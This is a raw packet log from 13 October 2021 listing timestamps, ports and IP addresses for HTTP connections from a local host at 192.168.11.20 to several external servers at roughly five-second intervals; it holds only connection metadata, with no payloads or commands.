Oct 13, 2021 15:52:48.968883991 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.968931913 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.968964100 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.968995094 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.969052076 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.969119072 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.969151974 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.969197989 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.969280005 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.969371080 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.969403028 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.969449997 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.969480991 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.969542980 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.969585896 CEST	80	49841	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.969715118 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.969808102 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.975795031 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.975939989 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.976263046 CEST	80	49840	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.976485968 CEST	49840	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.986309052 CEST	80	49841	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.986360073 CEST	80	49841	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:48.986737967 CEST	49841	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.986809969 CEST	49841	80	192.168.11.20	172.67.139.41
Oct 13, 2021 15:52:48.995584011 CEST	80	49841	172.67.139.41	192.168.11.20
Oct 13, 2021 15:52:54.000085115 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.010684967 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.010948896 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.012398005 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.012484074 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.012531996 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.012600899 CEST	49843	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.023175955 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.023242950 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.023276091 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.023305893 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.023401976 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.023425102 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.023433924 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.023490906 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.023511887 CEST	80	49843	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.023550034 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.023581028 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.023610115 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.023641109 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.023722887 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.023747921 CEST	49843	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.023787022 CEST	49843	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.023895025 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.034117937 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.034167051 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.034224033 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.034256935 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.034286976 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.034296036 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.034384966 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.034411907 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.034416914 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.034564018 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.034586906 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.034600019 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.034636974 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.034652948 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.034687996 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.034735918 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.034765959 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.034809113 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.034888029 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.034921885 CEST	80	49843	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.034998894 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.035037994 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.035070896 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.035130978 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.035161972 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.035178900 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.035192966 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.035378933 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.035517931 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.044857025 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.045098066 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.046189070 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.046474934 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.046479940 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.046525002 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.046550035 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.046621084 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.046689987 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.046724081 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.046753883 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.046782017 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.046982050 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.047065020 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.047286987 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.056967020 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.057265997 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.057295084 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.057313919 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.057367086 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.057440996 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.057496071 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.057615995 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.057667017 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.057730913 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.057761908 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.057920933 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.057934046 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.058068991 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.058089972 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.058105946 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.058151960 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.058247089 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.058258057 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.058368921 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.058414936 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.067792892 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.067888975 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.068321943 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.068646908 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.068933964 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.068979025 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.069075108 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.069333076 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.069376945 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.069444895 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.069478035 CEST	80	49842	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.069561005 CEST	49842	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.173382044 CEST	80	49843	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.173435926 CEST	80	49843	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:54.173810959 CEST	49843	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.173878908 CEST	49843	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:52:54.184432030 CEST	80	49843	75.2.115.196	192.168.11.20
Oct 13, 2021 15:52:59.362857103 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:52:59.587213993 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:52:59.587457895 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:52:59.588948011 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:52:59.589061022 CEST	49845	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:52:59.813571930 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:52:59.813637018 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:52:59.813688993 CEST	80	49845	154.215.231.81	192.168.11.20
Oct 13, 2021 15:52:59.813791990 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:52:59.813899994 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:52:59.813971996 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:52:59.813992977 CEST	49845	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:52:59.814057112 CEST	49845	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:53:00.038289070 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.038378000 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.038446903 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.038491011 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.038638115 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.038657904 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:53:00.038743973 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.038784981 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:53:00.039024115 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.039103031 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.039283991 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:53:00.039468050 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:53:00.043307066 CEST	80	49845	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.043380022 CEST	80	49845	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.043423891 CEST	80	49845	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.043843985 CEST	49845	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:53:00.043942928 CEST	49845	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:53:00.043956995 CEST	49845	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:53:00.263326883 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.263386011 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.263444901 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.263482094 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.263822079 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:53:00.263958931 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:53:00.264065027 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.264117956 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.264298916 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.264436960 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.264514923 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:53:00.264566898 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.264615059 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:53:00.264698029 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.264745951 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:53:00.264916897 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:53:00.264946938 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.265043974 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:53:00.265073061 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.265213966 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:53:00.265325069 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.265379906 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.265394926 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:53:00.265563965 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.265571117 CEST	49844	80	192.168.11.20	154.215.231.81
Oct 13, 2021 15:53:00.265878916 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.268062115 CEST	80	49845	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.488296032 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.488430023 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.488706112 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.488993883 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.489250898 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.489295959 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.489439011 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.489733934 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.489795923 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.490092993 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.490155935 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.490308046 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.490611076 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.490674019 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.490792036 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.491066933 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.491112947 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.491173029 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.491441011 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:00.491486073 CEST	80	49844	154.215.231.81	192.168.11.20
Oct 13, 2021 15:53:05.059885979 CEST	49846	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:53:05.226654053 CEST	80	49846	198.54.117.210	192.168.11.20
Oct 13, 2021 15:53:05.226958036 CEST	49846	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:53:05.228328943 CEST	49846	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:53:05.228396893 CEST	49846	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:53:05.228543997 CEST	49847	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:53:05.395163059 CEST	80	49846	198.54.117.210	192.168.11.20
Oct 13, 2021 15:53:05.395237923 CEST	80	49846	198.54.117.210	192.168.11.20
Oct 13, 2021 15:53:05.395277023 CEST	80	49846	198.54.117.210	192.168.11.20
Oct 13, 2021 15:53:05.395319939 CEST	80	49846	198.54.117.210	192.168.11.20
Oct 13, 2021 15:53:05.395349979 CEST	80	49846	198.54.117.210	192.168.11.20
Oct 13, 2021 15:53:05.395364046 CEST	49846	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:53:05.395452023 CEST	49846	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:53:05.395471096 CEST	49846	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:53:05.395493984 CEST	49846	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:53:05.395508051 CEST	49846	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:53:05.395595074 CEST	80	49847	198.54.117.210	192.168.11.20
Oct 13, 2021 15:53:05.395849943 CEST	49847	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:53:05.395910025 CEST	49847	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:53:05.438430071 CEST	80	49846	198.54.117.210	192.168.11.20
Oct 13, 2021 15:53:05.438785076 CEST	49846	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:53:05.562275887 CEST	80	49846	198.54.117.210	192.168.11.20
Oct 13, 2021 15:53:05.562385082 CEST	80	49846	198.54.117.210	192.168.11.20
Oct 13, 2021 15:53:05.562460899 CEST	80	49847	198.54.117.210	192.168.11.20
Oct 13, 2021 15:53:05.562469959 CEST	49846	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:53:05.562501907 CEST	49846	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:53:05.562553883 CEST	80	49847	198.54.117.210	192.168.11.20
Oct 13, 2021 15:53:10.574351072 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:10.737912893 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:10.738120079 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:10.739622116 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:10.739728928 CEST	49849	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:10.739779949 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:10.903352976 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:10.903414011 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:10.903450966 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:10.903563023 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:10.903664112 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:10.903723955 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:10.903774023 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:10.903878927 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:10.903925896 CEST	80	49849	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:10.903975010 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:10.904119015 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:10.904181004 CEST	49849	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:10.904226065 CEST	49849	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:10.904299021 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:11.067589045 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.067679882 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.067724943 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.067764997 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.067946911 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:11.068073988 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:11.068129063 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:11.068131924 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.068214893 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.068253040 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.068428993 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.068551064 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:11.068701982 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:11.068759918 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:11.075000048 CEST	80	49849	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.075078964 CEST	80	49849	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.075134039 CEST	80	49849	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.075185061 CEST	80	49849	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.075227022 CEST	80	49849	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.075592041 CEST	49849	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:11.075690031 CEST	49849	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:11.231966972 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.232053041 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.232122898 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.232165098 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.232204914 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.232203007 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:11.232306957 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:11.232310057 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.232527018 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.232569933 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.232603073 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:11.232716084 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:11.232728004 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.232768059 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:11.232887030 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.232928991 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.232997894 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:11.233139992 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.233184099 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:11.233294010 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.233448982 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.233491898 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.233630896 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.233774900 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.233995914 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.234045029 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.234256029 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.239490032 CEST	80	49849	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.396136045 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.396200895 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.396507025 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.396811008 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.397114038 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.398031950 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.398123980 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.398169994 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.398209095 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.398248911 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.398366928 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.398539066 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.398611069 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.398910046 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.405528069 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.405592918 CEST	80	49848	204.141.43.204	192.168.11.20
Oct 13, 2021 15:53:11.405739069 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:11.405802011 CEST	49848	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:53:16.088824987 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.099850893 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.100162983 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.101578951 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.101653099 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.101697922 CEST	49850	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.101810932 CEST	49851	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:53:16.112508059 CEST	80	49850	34.102.136.180	192.168.11.20
Oct 13, 2021 15:53:16.112705946 CEST	49850	80	192.168.11.20	34.102.136.180
